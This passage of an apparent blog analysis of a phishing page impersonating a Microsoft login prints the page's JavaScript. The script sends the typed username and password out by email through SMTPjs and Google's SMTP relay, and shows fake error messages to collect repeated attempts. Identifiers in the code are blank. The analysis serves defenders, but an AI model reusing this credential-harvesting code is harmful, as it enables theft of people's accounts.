:25+0000 Registrant Organization: Microsoft Corporation Registrant Street: One Microsoft Way, Registrant City: Redmond Registrant State/Province: WA Registrant Postal Code: 98052 Registrant Country: US ``` Since the attacker used legitimate web assets for their spoofed page, the page looks even more legitimate. Even details such as the web icon that shows in the browser tab is retrieved from a legitimate Microsoft source. ```html ``` Additionally, the background, logo, and arrow are referenced from Microsoft as well. ```html

``` ## Javascript Code Taking a look at the javascript code in the page shows that the attacker is taking advantage of an open source library named [SMTPjs](https://smtpjs.com/) to send data entered into the fake login form to the attacker. ```javascript var = .split('#')[1]; $('#').text(); function (qqq, www) { if(qqq.length < 1) { $('.errrmsg').html("Please enter your password.").show(); $('#').addClass('has-error ext-has-error'); return false; } else { $('#progressBar').css({'display':'block'}); $('.lightbox-cover').addClass('disable-lightbox'); var msg = " [U]> "+www; msg+=" [P]> "+qqq; msg+=" [Pub]> "+ $('#').val(); Email.send({ Host : "smtp-relay.gmail.com", Username : "", Password : "", To : '', From : "", Subject : $('#').val()+" CORS", Body : msg }).then( message => { if(message == "OK") { $('#progressBar').css({'display':'none'}); $('.lightbox-cover').removeClass('disable-lightbox'); var c = $('#').val(); if(c == 0) { c++; $('#').val(c); $('.errrmsg').html("Sign in attempt timed out.").show(); $('#').val(''); $('#').addClass('has-error ext-has-error'); } else if(c == 1) { c++; $('#').val(c); $('.errrmsg').html("Your account or password is incorrect.").show(); $('#').val(''); $('#').addClass('has-error ext-has-error'); } else if(c == 2) { c++; $('#').val(c); $('#').val(''); $('.errrmsg').html("Incorrect password, try again.").show(); $('#').addClass('has-error ext-has-error'); } else if(c == 3) { window.location.href="https://www.office.com/?auth=2"; } } else { $('#progressBar').css({'display':'none'}); $('.lightbox-cover').removeClass('disable-lightbox'); $('.errrmsg').html("Please enter your password.").show(); $('#').addClass('has-error ext-has-error'); } }); } } ``` ### Things to note - The script contains hard-coded credentials to send email through Google's smtp-relay.gmail.com mail server. - The variable c is being used to count th

Leave a Comment